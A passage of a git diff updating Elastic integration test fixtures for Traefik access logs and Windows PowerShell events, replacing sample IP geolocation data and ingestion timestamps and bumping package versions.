/assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -427,24 +427,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "PL-22", - "city_name": "Gdańsk", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Pomerania", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 18.649, - "lat": 54.3605 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6830, + "number": 29518, "organization": { - "name": "Liberty Global B.V." + "name": "Bredband2 AB" } }, - "address": "89.64.35.193", - "ip": "89.64.35.193" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "original": "/marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM" @@ -461,7 +461,7 @@ }, "related": { "ip": [ - "89.64.35.193" + "89.160.20.156" ] }, "http": { @@ -478,8 +478,8 @@ }, "event": { "duration": 8000000, - "ingested": "2021-06-08T12:48:40.207033100Z", - "original": "89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms", + "ingested": "2021-12-09T13:49:15.037453700Z", + "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -548,7 +548,7 @@ } }, "event": { - "ingested": "2021-06-08T12:48:40.207037600Z", + "ingested": "2021-12-09T13:49:15.037459400Z", "original": "127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] \"GET /apache_pb.gif HTTP/1.0\" 200 2326", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json index 06c35230cdf..3a1ce846417 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 40356, - "ingested": "2021-06-08T12:48:40.515007700Z", + "ingested": "2021-12-09T13:49:16.108367600Z", "original": "{\"BackendAddr\":\"\",\"BackendName\":\"Traefik\",\"BackendURL\":{\"Scheme\":\"\",\"Opaque\":\"\",\"User\":null,\"Host\":\"\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"127.0.0.1:48658\",\"ClientHost\":\"127.0.0.1\",\"ClientPort\":\"48658\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":19,\"DownstreamStatus\":404,\"DownstreamStatusLine\":\"404 Not Found\",\"Duration\":40356,\"FrontendName\":\"backend not found\",\"OriginContentSize\":19,\"OriginDuration\":4086,\"OriginStatus\":404,\"OriginStatusLine\":\"404 Not Found\",\"Overhead\":36270,\"RequestAddr\":\"backend.elastic-package-service.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":7,\"RequestHost\":\"backend.elastic-package-service.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T18:56:54.735539596Z\",\"StartUTC\":\"2021-03-16T18:56:54.735539596Z\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_X-Content-Type-Options\":\"nosniff\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_X-Content-Type-Options\":\"nosniff\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.67.0\",\"time\":\"2021-03-16T18:56:54Z\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -123,7 +123,7 @@ }, "event": { "duration": 3034764, - "ingested": "2021-06-08T12:48:40.515028400Z", + "ingested": "2021-12-09T13:49:16.108372900Z", "original": "{\"BackendAddr\":\"172.21.0.2:80\",\"BackendName\":\"backend-backend-docker\",\"BackendURL\":{\"Scheme\":\"http\",\"Opaque\":\"\",\"User\":null,\"Host\":\"172.21.0.2:80\",\"Path\":\"\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"172.21.0.1:59068\",\"ClientHost\":\"172.21.0.1\",\"ClientPort\":\"59068\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":383,\"DownstreamStatus\":200,\"DownstreamStatusLine\":\"200 OK\",\"Duration\":3034764,\"FrontendName\":\"Host-backend-docker-docker-localhost-2\",\"OriginContentSize\":383,\"OriginDuration\":2155389,\"OriginStatus\":200,\"OriginStatusLine\":\"200 OK\",\"Overhead\":879375,\"RequestAddr\":\"backend.docker.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":27,\"RequestHost\":\"backend.docker.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T19:08:41.039598834Z\",\"StartUTC\":\"2021-03-16T19:08:41.039598834Z\",\"downstream_Content-Length\":\"383\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Length\":\"383\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.64.1\",\"time\":\"2021-03-16T19:08:41Z\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/traefik/manifest.yml b/packages/traefik/manifest.yml index e116f28d380..b9529913088 100644 --- a/packages/traefik/manifest.yml +++ b/packages/traefik/manifest.yml @@ -1,6 +1,6 @@ name: traefik title: Traefik -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs and metrics from Traefik servers with Elastic Agent. type: integration diff --git a/packages/windows/changelog.yml b/packages/windows/changelog.yml index e7cb53565c9..60cd1ce321d 100644 --- a/packages/windows/changelog.yml +++ b/packages/windows/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.5.0" changes: - description: Support Kibana 8.0 diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json index ba60ee22974..1f6958b7011 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json @@ -37,7 +37,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:36.674249100Z", + "ingested": "2021-12-09T13:49:18.310984200Z", "code": "4105", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4105\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e102\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T09:04:04.755232500Z'/\u003e\u003cEventRecordID\u003e790\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{dd68516a-2930-0000-5962-68dd3029d601}'/\u003e\u003cExecution ProcessID='4204' ThreadID='1476'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003ef4a378ab-b74f-41a7-a5ef-6dd55562fdb9\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e9c031e5c-8d5a-4b91-a12e-b3624970b623\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -148,7 +148,7 @@ }, "event": { "sequence": 34, - "ingested": "2021-06-14T13:22:36.674267700Z", + "ingested": "2021-12-09T13:49:18.310994Z", "code": "4103", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.897949500Z'/\u003e\u003cEventRecordID\u003e3885\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0002-c208-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='3984' ThreadID='3616'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = ed57761b-ba0f-4d11-87d9-fac33820d20e\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.17763.1007\n Runspace ID = 0729459a-8646-4176-8b02-024421a9632e\n Pipeline ID = 1\n Command Name = cmd.exe\n Command Type = Application\n Script Name =\n Command Path = C:\\Windows\\system32\\cmd.exe\n Sequence Number = 34\n User = VAGRANT\\vagrant\n Connected User = VAGRANT\\vagrant\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(cmd.exe): \"cmd.exe\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"symbolic link created for C:\\vagrant \u0026lt;\u0026lt;===\u0026gt;\u0026gt; \\\\vboxsvr\\vagrant\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:13:06.703293900Z'/\u003e\u003cEventRecordID\u003e3917\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0003-db0b-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='5032' ThreadID='4160'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.17763.1007\n Host ID = aae5217d-054f-435f-9968-4b5bebf12116\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n Engine Version = 5.1.17763.1007\n Runspace ID = a87e8389-57c7-4997-95ff-f82f644965bf\n Pipeline ID = 9\n Command Name = Resolve-Path\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 22\n User = VAGRANT\\vagrant\n Connected User =\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"WarningAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"InformationAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"Verbose\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Debug\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Gopath\\src\\github.com\\elastic\\beats\\x*\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -199,7 +199,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:36.674277300Z", + "ingested": "2021-12-09T13:49:18.311000300Z", "code": "4106", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4106\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e103\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T10:40:32.595715200Z'/\u003e\u003cEventRecordID\u003e933\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{e3200b8a-290e-0002-332a-20e30e29d601}'/\u003e\u003cExecution ProcessID='4776' ThreadID='5092'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003e4c487c13-46f7-4485-925b-34855c7e873c\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e3f1a9181-0523-4645-a42c-2c1868c39332\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -253,7 +253,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:36.674286400Z", + "ingested": "2021-12-09T13:49:18.311036400Z", "code": "4104", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.389266200Z'/\u003e\u003cEventRecordID\u003e3580\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0001-18e0-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e.\\patata.ps1\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003e50d2dbda-7361-4926-a94d-d9eadfdb43fa\u003c/Data\u003e\u003cData Name='Path'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.393884800Z'/\u003e\u003cEventRecordID\u003e3582\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0000-79db-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003ef5521cbd-656e-4296-b74d-9ffb4eec23b0\u003c/Data\u003e\u003cData Name='Path'\u003eC:\\Users\\vagrant\\Desktop\\patata.ps1\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json index ee7faa49f4f..16222c981bb 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-operational-events.json-expected.json @@ -37,7 +37,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:37.106565300Z", + "ingested": "2021-12-09T13:49:18.946679500Z", "code": "4105", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4105\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e102\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T09:04:04.755232500Z'/\u003e\u003cEventRecordID\u003e790\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{dd68516a-2930-0000-5962-68dd3029d601}'/\u003e\u003cExecution ProcessID='4204' ThreadID='1476'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003ef4a378ab-b74f-41a7-a5ef-6dd55562fdb9\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e9c031e5c-8d5a-4b91-a12e-b3624970b623\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -148,7 +148,7 @@ }, "event": { "sequence": 34, - "ingested": "2021-06-14T13:22:37.106575800Z", + "ingested": "2021-12-09T13:49:18.946689400Z", "code": "4103", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.897949500Z'/\u003e\u003cEventRecordID\u003e3885\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0002-c208-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='3984' ThreadID='3616'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = ed57761b-ba0f-4d11-87d9-fac33820d20e\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.17763.1007\n Runspace ID = 0729459a-8646-4176-8b02-024421a9632e\n Pipeline ID = 1\n Command Name = cmd.exe\n Command Type = Application\n Script Name =\n Command Path = C:\\Windows\\system32\\cmd.exe\n Sequence Number = 34\n User = VAGRANT\\vagrant\n Connected User = VAGRANT\\vagrant\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(cmd.exe): \"cmd.exe\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"symbolic link created for C:\\vagrant \u0026lt;\u0026lt;===\u0026gt;\u0026gt; \\\\vboxsvr\\vagrant\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:13:06.703293900Z'/\u003e\u003cEventRecordID\u003e3917\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0003-db0b-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='5032' ThreadID='4160'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.17763.1007\n Host ID = aae5217d-054f-435f-9968-4b5bebf12116\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n Engine Version = 5.1.17763.1007\n Runspace ID = a87e8389-57c7-4997-95ff-f82f644965bf\n Pipeline ID = 9\n Command Name = Resolve-Path\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 22\n User = VAGRANT\\vagrant\n Connected User =\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"WarningAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"InformationAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"Verbose\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Debug\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Gopath\\src\\github.com\\elastic\\beats\\x*\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -199,7 +199,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:37.106582500Z", + "ingested": "2021-12-09T13:49:18.946695800Z", "code": "4106", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4106\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e103\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T10:40:32.595715200Z'/\u003e\u003cEventRecordID\u003e933\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{e3200b8a-290e-0002-332a-20e30e29d601}'/\u003e\u003cExecution ProcessID='4776' ThreadID='5092'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003e4c487c13-46f7-4485-925b-34855c7e873c\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e3f1a9181-0523-4645-a42c-2c1868c39332\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -253,7 +253,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:37.106588800Z", + "ingested": "2021-12-09T13:49:18.946702100Z", "code": "4104", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.389266200Z'/\u003e\u003cEventRecordID\u003e3580\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0001-18e0-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e.\\patata.ps1\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003e50d2dbda-7361-4926-a94d-d9eadfdb43fa\u003c/Data\u003e\u003cData 